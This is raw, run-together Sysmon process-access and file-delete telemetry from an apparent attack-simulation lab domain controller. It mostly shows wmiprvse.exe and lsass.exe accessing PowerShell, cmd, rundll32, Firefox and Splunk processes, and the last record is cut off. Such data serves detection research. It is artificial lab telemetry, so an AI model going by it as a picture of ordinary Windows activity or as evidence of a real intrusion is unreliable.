16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C34320B4E9BE278206695871C339A4D,SHA256=078341AEFC6F008B3E3A3E3408E24F5A387F0CD25BF736DA31A26CCB4D6CBFD9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b